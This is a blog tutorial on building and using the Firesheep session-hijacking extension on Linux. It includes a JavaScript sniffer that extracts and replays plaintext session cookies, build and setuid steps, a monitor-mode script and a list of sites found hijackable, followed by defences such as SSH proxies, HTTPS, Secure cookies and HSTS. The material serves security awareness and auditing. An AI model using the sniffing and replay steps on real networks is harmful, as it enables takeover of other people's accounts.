This document describes how to install Firesheep under Linux. It was tested on Ubuntu Maverick, but the technique should carry over to most Linux distributions without much trouble. Normally I like newbies; I was once one of you and I love teaching people how to use Linux. This is a special case: if you're not already somewhat skilled you should NOT be using Firesheep. If you want to use it to answer a particular question, feel free to contact me and I'll answer as best I can. If you want to make rude comments on other people's Twitter feeds, please go elsewhere.
I'm a bit torn about Firesheep, which makes me uncertain about this document: it's like putting a loaded gun in the hands of a toddler. The legitimate use of Firesheep was to force Facebook to offer an SSL-enabled site; mission accomplished. Several other sites still need help: Google is not 100% SSL enabled, and Twitter, Yahoo! and Amazon are also in Firesheep's dropdown list. It's a great way to demonstrate how insecure web browsing on a public WiFi hotspot can be, why we should all look into SSH proxies whenever possible, and why we should keep pressuring content providers for the SSL encryption we need to actually be safe.
Firesheep was released in October 2010 by security researcher Eric Butler. Firesheep itself is nothing new; session hijacking has been around for ages, but Eric was the first to make it idiot-accessible (and, let's face it, anyone who routinely says "haxors" instead of "hackers" or "l33t" instead of "elite" is probably an idiot). Firesheep listens in on the wireless network you're connected to and watches for anyone else on that network using certain vulnerable websites. It doesn't steal your password, because the login itself is protected by an SSL connection. What it exploits is that most sites treat HTTPS as too expensive or slow to use for everything, so after the login they hand your browser a session cookie and then accept that cookie over plain HTTP, in the clear, on every later request. That cookie essentially says "I've already been authenticated and here's my session ID", and because the site never marked it Secure the browser will happily send it unencrypted. For the most part this is fine: your ISP really doesn't care about your Facebook posts, and snooping packets on a wire needs actual skill (and, in many cases, physical access). But at your local Starbucks, while you're sipping your grande skinny soy whatever, anyone nearby can slurp down each and every packet you send out, including the ones carrying that magic cookie.
Firesheep listens for those cookies from the websites it knows about and pops up a little icon when it finds one. Clicking the icon opens the site and presents it with the captured cookie, logging you in as that user without needing a password. There are limits: you need to be on the same WiFi network (or a non-switched wired network, which is hard to come by these days; on a switched network the attacker would first need something like ARP spoofing to see your traffic at all), the victim must not be using the site's SSL option (Facebook and parts of Google offer one), the session may expire after a period of time, and so on. But Firesheep makes it pretty trivial to view and post as another user, even to the point of showing the user's profile picture so you may be able to recognize them across the room.
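To make the mechanism concrete, here is an added example (written for this page, not Firesheep's own code) of the sniffer side: a handler list in the spirit of Firesheep's per-site definitions, a parser for plaintext HTTP request heads, and a matcher that lifts the session cookie when it sees one. The hostnames, cookie names and captured requests are constructed; the last capture is the first few bytes of a TLS record, which is all a sniffer ever sees of an HTTPS session.

```javascript
// Added example, not Firesheep's own code: how a sniffer matches plaintext
// HTTP requests against per-site handlers and lifts the session cookie.
// The handler list and the captured requests are constructed samples.

const HANDLERS = [
  // Each handler says which hosts to watch and which cookie(s) carry the
  // login. Firesheep ships one such definition per site; these are invented.
  { name: 'Example Social', domains: ['social.example'], sessionCookieNames: ['sess_id'] },
  { name: 'Example Shop', domains: ['shop.example'], sessionCookieNames: ['shop_session', 'shop_user'] },
];

const REQUEST_LINE = /^(GET|POST|PUT|HEAD|DELETE|OPTIONS) \S+ HTTP\/1\.[01]\r\n/;

// Split a plaintext HTTP/1.x request head into request line and headers.
// Returns null for anything that is not plaintext HTTP (e.g. a TLS record).
function parseRequest(payload) {
  const raw = Buffer.isBuffer(payload) ? payload.toString('latin1') : payload;
  if (!REQUEST_LINE.test(raw)) return null;
  const lines = raw.split('\r\n\r\n')[0].split('\r\n');
  const [method, path] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i < 0) continue;
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, path, headers };
}

// "a=1; b=2" -> { a: '1', b: '2' }
function parseCookieHeader(value) {
  const cookies = {};
  for (const part of (value || '').split(';')) {
    const i = part.indexOf('=');
    if (i < 0) continue;
    cookies[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return cookies;
}

function hostMatches(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}

// Match one captured TCP payload against the handler list. Returns
// { site, host, cookies } when every session cookie the handler needs is
// present in the clear, otherwise null.
function matchRequest(payload) {
  const req = parseRequest(payload);
  if (!req) return null;
  const host = (req.headers.host || '').split(':')[0].toLowerCase();
  const cookies = parseCookieHeader(req.headers.cookie);
  for (const h of HANDLERS) {
    if (!h.domains.some((d) => hostMatches(host, d))) continue;
    if (!h.sessionCookieNames.every((n) => n in cookies)) continue;
    const stolen = Object.fromEntries(h.sessionCookieNames.map((n) => [n, cookies[n]]));
    return { site: h.name, host, cookies: stolen };
  }
  return null;
}

// The replay step: the Cookie header the attacker's browser would present.
function replayCookieHeader(match) {
  return Object.entries(match.cookies).map(([k, v]) => `${k}=${v}`).join('; ');
}

function sniff(captures) {
  return captures.map(matchRequest).filter(Boolean);
}

// Constructed captures: two plaintext sessions, one unrelated site that
// happens to use the same cookie name, and the start of a TLS ClientHello
// standing in for an HTTPS session (no handler can do anything with it).
const CAPTURES = [
  'GET /home HTTP/1.1\r\nHost: www.social.example\r\nCookie: lang=en; sess_id=9f3c2a\r\n\r\n',
  'GET /cart HTTP/1.1\r\nHost: shop.example\r\nCookie: shop_session=abc123; shop_user=alice\r\n\r\n',
  'GET /index.html HTTP/1.1\r\nHost: news.example\r\nCookie: sess_id=not-watched\r\n\r\n',
  Buffer.from([0x16, 0x03, 0x01, 0x00, 0xc4, 0x01, 0x00, 0x00, 0xc0, 0x03, 0x03]),
];

for (const m of sniff(CAPTURES)) {
  console.log(`${m.site} session from ${m.host}: Cookie: ${replayCookieHeader(m)}`);
}
```

Run it with node; it prints one line per hijackable session. The unrelated site carrying a cookie named sess_id is ignored: a handler only fires for hosts it claims, which is why the size of Firesheep's website list matters so much in the findings later on.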
Installing Firesheep is probably not illegal; it's a bit like owning a set of lockpicks. They're generally legal to own but not legal to use unless the owner of the lock approves, though watch out: some places actually do think they can stop thieves by making lockpicks illegal to own. In most parts of the world it's probably fine to use Firesheep as it was (presumably) intended, as a security tool to audit websites. For myself, I've used it to see whether Tweetdeck is vulnerable on my own computer. Luckily, with Facebook, Twitter, FourSquare and Buzz all enabled in Tweetdeck I didn't see anything pop up in Firesheep, so I appear to be safe for most of the applications I care about. However, using non-SSL Google pages or going to Twitter's website in Chrome, I was able to access my account in Firefox without logging in and, most distressingly, I was able to get into my Amazon account just by browsing to Amazon's website.
What you do with Firesheep may well be illegal if you do it to someone without their knowledge. Viewing their information may be protected by state or federal privacy laws. Posting under that user's account may be construed as identity theft. Obviously, hacking into someone's Amazon account and making a purchase crosses far more boundaries than I can begin to list. In essence, about the only thing that MAY be legal to do with Firesheep is look at all the pretty icons that come up.
Building Firesheep is the hard part. First you'll need git if you don't have it already; under Debian-based systems that's just sudo apt-get install git. Git is the open source version control system the Firesheep source is kept in, and GitHub is the site that hosts that repository for public viewing (and forking).
We'll also want our build dependencies in place. I needed to add the following, but you may need more (especially if you don't already have things like tcpdump or wireshark installed): sudo apt-get install git dh-autoreconf xulrunner-dev libpcap-dev libboost-dev libhal-dev libhttp-parser-perl
Now we're ready to get crackin'!
cd
git clone git://github.com/mickflemm/firesheep.git
cd firesheep
git submodule update --init
./autogen.sh --with-xulrunner-sdk=/usr/lib/xulrunner-devel-188.8.131.52
You may find that autogen.sh complains about missing pieces here. You've got three choices:
1) Use apt-cache search to find the package providing the missing dependency and install it.
2) Install everything under the sun with the command sudo apt-get install git libcap2-bin libsmi2ldbl libc-ares2 wireshark-common wireshark libstdc++6-4.4-dev g++-4.4 libboost1.42-dev libboost-dev x11proto-core-dev libice-dev libxau-dev libxdmcp-dev x11proto-input-dev x11proto-kb-dev xtrans-dev libpthread-stubs0 libpthread-stubs0-dev libxcb1-dev libx11-dev g++ libdpkg-perl dpkg-dev build-essential html2text libunistring0 gettext intltool-debian po-debconf debhelper libalgorithm-diff-perl libalgorithm-merge-perl libglib2.0-bin zlib1g-dev libglib2.0-dev libatk1.0-dev libcairo-gobject2 libexpat1-dev libfreetype6-dev libfontconfig1-dev x11proto-render-dev libxrender-dev libpng12-dev libsm-dev libpixman-1-dev libxcb-render0-dev libxcb-shm0-dev libcairo2-dev libdbus-1-dev libdbus-glib-1-dev libgdk-pixbuf2.0-dev libxft-dev libpango1.0-dev x11proto-xext-dev libxext-dev x11proto-xinerama-dev libxinerama-dev libxi-dev x11proto-randr-dev libxrandr-dev x11proto-fixes-dev libxfixes-dev libxcursor-dev x11proto-composite-dev libxcomposite-dev x11proto-damage-dev libxdamage-dev libgtk2.0-dev libsys-hostname-long-perl libmail-sendmail-perl libnotify-dev libnspr4-dev libnss3-dev libiw-dev m4 autoconf autotools-dev automake autopoint libtool dh-autoreconf libltdl-dev libpcap0.8-dev libpcap-dev libreadline5 libruby1.8 libpcap-ruby1.8 libpcap-ruby libpcapnav0 libpcapnav0-dev python-libpcap libpcap0.8-dbg xulrunner-1.9.2-dev xulrunner-1.9.2
3) Give up because it's too hard.
Once that completes, just run make and it will build build/firesheep.xpi, the Firefox extension.
So you've got mad haxor skillz yet can't quite follow instructions and build it yourself? I promise this version doesn't have a keylogger built in that sends me the passwords to all of your accounts. Honest. Now go back and build it so you can actually learn something instead of just defacing strangers' Facebook pages! Note that this was built on a Maverick amd64 system. The native backend binary inside the .xpi is architecture-specific, so it did not work on a Maverick i386 system and you may be stuck building it yourself anyway.
Open up Firefox (yes, I know, it's bloated and slow and pretty much turning into the IE of the non-Windows world, but its extension model is also the only one that lets an add-on ship and run a native packet-capture backend; at least the Linux version still requires root access to set that up). If you start from the command line you can run firefox firesheep.xpi; otherwise just drag firesheep.xpi into an open Firefox window. It will install and prompt you to restart the browser. Don't bother; just shut down Firefox for now.
You need to give Firesheep's backend the permissions it needs to open the capture interface. Change into the installed extension's platform/*gcc3 directory inside your Firefox profile and run cd ~/.email@example.com/platform/*gcc3 && sudo ./firesheep-backend --fix-permissions, entering your password as needed. This makes the firesheep-backend binary setuid root, which is exactly why you should build it from source rather than trust a binary somebody else handed you. If this step fails you probably downloaded my .xpi file and it isn't working on your system; try building it yourself and see if that fixes things.
Now open Firefox, go to the Add-ons manager and click the Preferences button for Firesheep. About the only thing you'll need to do is select the interface to listen on; for most people that will be a WLAN interface, as shown below. If you get an error message, or don't see any interfaces here, you didn't run firesheep-backend --fix-permissions properly and should read the previous paragraph again.
Now you should be all set to run Firesheep. To test it, make sure you've got another browser installed (it doesn't matter which one; I prefer Google Chrome, though open source nuts may prefer sudo apt-get install chromium-browser).
Firesheep is designed to be very easy to use. To start, open the Firesheep sidebar (View -> Sidebar -> Firesheep, or Shift-Ctrl-S). In a very tiny Firefox window dominated by a lot of Firefox clutter, you should see something like this.
Just click the Start Capturing button and then move to your other browser. Log in to, or just access, a site Firesheep knows about; for the list, go back to the Firesheep preferences (also reachable from the little gear icon at the bottom of the sidebar) and click the tab listing the supported websites. By opening Twitter in Chrome, my Firefox browser was able to capture my own login. You can view details of the capture by clicking the little up arrow and then on the user, but that is not information I'm about to publish, for obvious reasons. Double-clicking the icon opens that session in the main browser window.
If you want to stop the capture, just click the (surprise!) Stop Capturing button. The gear icon gives you the option to clear your current list. That's about all there is to it: pretty simple and pretty scary. Luckily some of the captures don't work very well; I can log into the Google homepage as myself, but accessing my Gmail account still requires a password.
If you're running into capture issues you may need to put your WiFi interface into promiscuous mode. All jokes about your spouse/significant other/mother/etc. aside, promiscuous mode tells your network interface to hand the operating system every frame it receives, not just the ones addressed to it. (On WiFi there is also monitor mode, which goes further and delivers raw 802.11 frames without being associated to any network at all; the script below actually uses that, see the note there.) While the sources for this document describe this step, I haven't needed it myself. One reason for that may be my chipset, but the real reason is that I couldn't care less about hijacking other people's sessions and only need to listen to my own packets.
First things first: you have actually tried to capture your own session from another browser, right? If that didn't work you'll need to fix it before you continue. The troubleshooting that follows is all based on the premise that Firesheep itself is working but your capture is not; if you can't capture your own local traffic you won't be able to capture anyone else's.
I've created a simple script that lets you run firesheep enable to put your interface into capture mode and firesheep disable to move back to normal mode. You'll probably want to edit the interface variable: on my Broadcom-based system it's eth1, but on many systems it will be wlan0. As I mentioned, I don't need this script so I don't run it. Note that despite the "promiscuous" wording above, what the script actually does is switch the card into 802.11 monitor mode (iwconfig mode monitor). Monitor mode drops your association with the access point, which is why on some systems you won't be able to send packets in Firesheep mode, only receive them.
Example A-1. firesheep
#!/bin/bash
# Toggle the wireless interface between 802.11 monitor mode ("Firesheep mode")
# and normal managed mode. Edit the interface name to match your system.
interface=wlan0

if [ "$#" -ne 1 ]; then
    echo "Usage:"
    echo "  $(basename "$0") enable|disable"
    exit 1
fi

if [ "$EUID" -ne 0 ]; then
    echo "Sorry, $(basename "$0") must be run as root"
    exit 2
fi

case "$1" in
    enable)
        # Monitor mode drops the association with the access point: the card
        # receives everything on the channel but can no longer send.
        ifconfig "$interface" down
        iwconfig "$interface" mode monitor
        ifconfig "$interface" up
        echo "Enabling Firesheep mode"
        ;;
    disable)
        ifconfig "$interface" down
        iwconfig "$interface" mode managed
        ifconfig "$interface" up
        echo "Disabling Firesheep mode"
        ;;
    *)
        echo "Unknown argument: $1 (expected enable or disable)"
        exit 1
        ;;
esac
Some people have had luck swapping their wireless kernel modules around, replacing Broadcom's proprietary wl driver with the open b43 one. To try this out, run sudo rmmod wl && sudo modprobe b43 (modprobe, not insmod, since insmod wants a full path to the module file). If you just broke your network connection, reboot and try something else.
Finally, some people have had luck starting a capture program before using Firesheep. Running something like tcpdump or ettercap may help, since it will put the interface into promiscuous mode for you. They are also infinitely more useful utilities if you actually want to graduate from Anonymous "haxor" loser status to a hacker who knows what they're doing.
I'm probably not going to help most people with this unless they can tell me why they need it up and running. However, feel free to look at Bryan's Geek Stuff or the GitHub thread for more details. If you don't understand what's there, you probably won't understand what Firesheep is good for anyway ;)
Having actually used Firesheep for research, I figured I'd share my findings. First, Firesheep has a fairly easily editable list of websites it can sniff, and that list is much more extensive than I had expected. I thought Firesheep was mostly about Facebook and Twitter, but the list of affected websites includes pretty much every major web email provider and even the website hosting the code.
Luckily, not all of them give you anything meaningful. Google, for example, lets you get to the search page apparently associated with the user, but if you try to open any useful app such as Gmail or Docs it prompts for a username and password. The code hosting website also seems to forward everyone over SSL now, so they've fixed the issue. And Facebook offers the option to use SSL, which prevents Firesheep from hijacking the session, as long as you've enabled it. Follow these links for pictures and video showing how to turn this feature on.
Yahoo is similar to Google: an attacker can mess with your homepage layout, but to get to mail or groups they'll need to log in.
The Tweetdeck Chrome Extension (at least with Facebook set to HTTPS mode) doesn't expose you to Firesheep. I haven't played with the AIR app but I assume it works in a similar manner.
Twitter does have an SSL-enabled site that is protected, but it doesn't have Facebook's feature of forcing you onto it. You need to manually type https://www.twitter.com/ to use it, and any plain http:// link back to Twitter puts you right back in the clear.
Hotmail users, you may want to submit to your Google overlords. With Firesheep an attacker can take over the session and read and send mail as though they had your password. There are websites explaining how to secure this, but really, there's no excuse for making you change a setting to get it.
Don't browse Amazon on open WiFi connections. Sure, the attacker won't be able to ship themselves anything good, since Amazon wisely requires a password before adding a new address, but they can still buy a few thousand dollars of stuff, and if you miss the emails or can't cancel the order in time it'll be a hassle to send it all back.
So Firesheep is indeed scary for a lot of sites. What do you do about it?
One good idea is not to use public WiFi networks at all. Unsecured networks like these are a hunting ground for hackers, including ones with far more sophisticated tools than Firesheep. Remember that your work WiFi network is also effectively public, even if it is secured: everyone else with the key is on it with you. Separate your work and home life; don't post on Facebook at work and don't shop on Amazon there.
Obviously, in some cases avoiding public WiFi is tough. If you've got a VPN it may help protect you, depending on how it's implemented (a full-tunnel VPN hides everything from the hotspot; a split-tunnel one only covers what it routes). One good option if you've got a smartphone (and a reasonable carrier) is to use its WiFi hotspot functionality while you're in Starbucks. That gives you a private, secured WiFi network whose key only you know, probably about as fast as the public network (and with LTE probably a good deal faster).
If you have a WiFi network at home (and who doesn't?) you need to secure it. Check your router manual and enable WPA2 (WEP is not security; people willing to download Firesheep can just as easily download equally point-and-click tools to crack WEP). One caveat: WPA/WPA2-Personal uses a single passphrase for everyone, and anyone who knows it and captures your association handshake can still decrypt your traffic. It keeps strangers out, but it does not protect you from the other users of the same network, which is why the work network in the previous paragraph still counts as public.
Proxies are nice, they can create an encrypted connection from your browser to a trusted computer out on the Internet which is a bit more secure than an open WiFi hotspot. But proxies are bad in that they slow down your day-to-day browsing by rerouting your traffic far away and incurring the overhead of encryption on things that don't really need it.
If you use Chrome you'll want to look into Proxy Switchy!, which lets you selectively use a proxy for certain websites and leave the others alone. I use it to route work websites through my work proxy, sites like Amazon, Facebook and Twitter through my home proxy, and to switch to Tor when necessary (more on these later). Firefox users can look at FoxyProxy, which has similar features. I haven't researched IE, and Safari users tend not to have anything worth stealing since they spend all their money on underpowered shiny things.
I have an SSH server. They're really easy to set up on Linux, and Windows isn't too hard either (although you can look into a Linux virtual machine if you want to have a little more fun!). You'll also need to set up port forwarding on your router. You can use this annoying website to get instructions: select your router from the list after the annoying "you can pay us to do it for you" ad, then click the link at the top to skip the annoying "you can pay us to do it for you" ad, then click on SSH after the annoying "you can pay us to do it for you" ad, and it will walk you through opening the port for your SSH server. The server should run on your desktop at home, and you'll probably want a Dynamic DNS service so you have an easy-to-remember hostname. Since you're exposing SSH to the whole Internet, switch to key-based authentication and turn password logins off before you do; a forwarded port 22 gets brute-forced within hours.
Once you've got an SSH server at home, you can connect to it from your laptop. On Linux it's as simple as ssh -D 1080 your.hostname.com. Now you can point your browser at a SOCKS proxy on yourself (known as "localhost" or "127.0.0.1") on port 1080. If you visit a site like http://www.whatsmyip.org/ you'll notice that (if you've set this up properly) the IP address listed is your home address instead of wherever you actually are. One caveat: by default Firefox still resolves DNS locally when using a SOCKS proxy, which leaks the names of every site you visit to the hotspot; set network.proxy.socks_remote_dns to true in about:config so lookups go through the tunnel too.
Under Windows I'd recommend installing Cygwin. This gives you the same ssh command as under Linux (as well as a lot of other cool stuff) without needing a virtual machine or a dual boot. For those who prefer a GUI, look into PuTTY, a common and highly functional Windows SSH client that can set up the same dynamic port forward.
The nice thing is that this is a SOCKS proxy, so you're not limited to web browsing. You can access your email through it, IM chats, or just about anything else. It's encrypted from your laptop to your home computer, but it's important to note that it's NOT encrypted from your home computer onward to the Internet. (If you already have a secure connection to a website, it's doubly protected as far as your home and then has only its own protection from your home to the website.) This is safer because only your ISP really has access to that data, but it's not a complete solution.
Another nice side effect is that if you travel overseas you can use this proxy to view local content. If you're a US resident and like Hulu or Netflix, traveling outside the US means your access is blocked. By using an SSH tunnel to your house as a proxy, it looks like you're viewing the content from your home. Now the connection may not be as good as when you are in the US but in general it should be just fine.
An arguably more secure version is to use the Tor Project. This is an anonymizing proxy network that encrypts your traffic from your computer, through several Tor relays, to an exit node you don't choose. There is a risk that the exit is run by a bad guy, and the exit sees anything you send unencrypted just as the hotspot would, so HTTPS still matters; but neither you nor he controls which exit you land on, so a directed attack against you is harder, and most Tor operators donating bandwidth aren't in it to hack your Facebook account. Tor is also very slow, so use it wisely and consider donating your own bandwidth by running a relay.
HTTPS end to end is really the only viable solution. Encryption from your browser all the way to the server will protect you better than anything else here. The critical flaw that Firesheep exploits is that when you're on WiFi anyone on that WiFi connection can hear everything you say. Using a third-party proxy means trusting the proxy owner. Using your own proxy is better, but you're still unprotected once the traffic leaves your home and crosses the Internet. It takes a much more sophisticated attacker to pull off an attack there, but it still requires trusting your ISP and every network between your home and the server you're talking to.
Arguments against HTTPS include expense and resources. Any major site can afford a good SSL certificate; expense is no excuse for the major players (and most already have a certificate for at least their login page). As a barrier to entry for a new startup it's also a non-issue. I've written a quick tutorial on Configuring Apache2 for SSL Under Ubuntu Lucid where I mention StartSSL as a good, and free, solution for basic encryption. It takes a very small amount of time, and the certificate lasts a year, after which it can be renewed, again for free.
A slightly more accurate complaint concerns resource utilization. For small businesses this isn't a problem; for a low-volume web server like mine the overhead of SSL is pretty much nothing. For a large organization a dedicated SSL termination box can offload the work from your web servers and let them function even better. It's only the mid-sized organizations with a web server running marginally below capacity that may need to expand a bit. But still, if the cost of an extra SSL termination server or a web server upgrade is a significant part of your operating expenses, you really need to look at your business model.
However, not all websites need SSL encryption. My own website largely does not; the only two pages that really should have it are my forums (which are largely unused) and my Stoker management pages. The pages that need to be secured are those that actually pass personal information. Whether they pass credit card numbers or simply let you post a comment on a news story, protecting your online identity is important. From my perspective there is also no downside to encrypting this page, even though a snooper couldn't possibly glean anything personal about you from it.
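As an added example (not from the original page), here is the server-side version of that fix in JavaScript: how a session cookie should be issued so the browser will never send it over plain HTTP, an auditor that flags a response whose session cookies lack the Secure attribute, and the redirect-plus-HSTS policy that keeps users on https:// in the first place. Cookie names and values are constructed; HttpOnly and SameSite are included as general hardening (SameSite did not exist in Firesheep's day), but it is the Secure attribute, together with serving every page over TLS, that closes the hole Firesheep exploits.

```javascript
// Added example, not from the original page: the server-side fix for what
// Firesheep exploits. Cookie names and values are constructed samples.

// Build a Set-Cookie header for a session cookie. Secure means the browser
// never sends it over plain http:// (the Firesheep fix); HttpOnly keeps page
// scripts from reading it; SameSite=Lax is modern CSRF hygiene.
function sessionSetCookie(name, value, { maxAge = 3600 } = {}) {
  return `${name}=${value}; Path=/; Max-Age=${maxAge}; Secure; HttpOnly; SameSite=Lax`;
}

// Parse one Set-Cookie header into { name, value, attrs }. Attribute names
// are lower-cased; valueless attributes (Secure, HttpOnly) map to true.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';');
  const eq = pair.indexOf('=');
  const name = pair.slice(0, eq).trim();
  const value = pair.slice(eq + 1).trim();
  const attrs = {};
  for (const part of rest) {
    const i = part.indexOf('=');
    const key = (i < 0 ? part : part.slice(0, i)).trim().toLowerCase();
    attrs[key] = i < 0 ? true : part.slice(i + 1).trim();
  }
  return { name, value, attrs };
}

// Audit the Set-Cookie headers of a response: every cookie on the session
// list must carry Secure and HttpOnly. Returns a list of findings (empty = ok).
function auditSetCookies(setCookieHeaders, sessionNames) {
  const findings = [];
  for (const header of setCookieHeaders) {
    const c = parseSetCookie(header);
    if (!sessionNames.includes(c.name)) continue;
    if (!c.attrs.secure) findings.push(`${c.name}: missing Secure, will be sent in the clear over http://`);
    if (!c.attrs.httponly) findings.push(`${c.name}: missing HttpOnly`);
  }
  return findings;
}

// Transport policy for one request. `secure` is whether it arrived over TLS
// (in Node that is req.socket.encrypted). Plain-HTTP requests get a permanent
// redirect to the same URL on https://; TLS requests get an HSTS header so the
// browser refuses to go back to http:// for a year. HSTS is only honoured when
// received over TLS, which is why it is not put on the redirect itself.
function transportPolicy({ secure, host, url }) {
  if (!secure) {
    return { redirect: 301, headers: { Location: `https://${host}${url}` } };
  }
  return {
    redirect: null,
    headers: { 'Strict-Transport-Security': 'max-age=31536000; includeSubDomains' },
  };
}

// Constructed sample: a login response as a Firesheep-era site might have
// sent it, and the same response issued correctly.
const SESSION_NAMES = ['sess_id'];
const WEAK_RESPONSE = ['sess_id=9f3c2a; Path=/', 'lang=en; Path=/'];
const FIXED_RESPONSE = [sessionSetCookie('sess_id', '9f3c2a'), 'lang=en; Path=/'];

console.log('weak :', auditSetCookies(WEAK_RESPONSE, SESSION_NAMES));
console.log('fixed:', auditSetCookies(FIXED_RESPONSE, SESSION_NAMES));
console.log(transportPolicy({ secure: false, host: 'shop.example', url: '/cart?item=42' }));
```

The audit only cares about cookies on the session list: a non-sensitive preference cookie like lang can stay plaintext, which is the same distinction the paragraph above makes between pages that carry personal information and pages that don't. Note that once a site sets HSTS, even the "type https:// manually" workaround described for Twitter becomes unnecessary, because the browser upgrades the request itself.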
My name is Jeff Bower, I'm a technology professional with more years of experience in the telecommunications industry than I'd care to admit. I tend to post with the username jdbower on various forums. Writing these documents is a hobby of mine, I hope you find them useful and feel free to browse more at https://www.ebower.com/docs.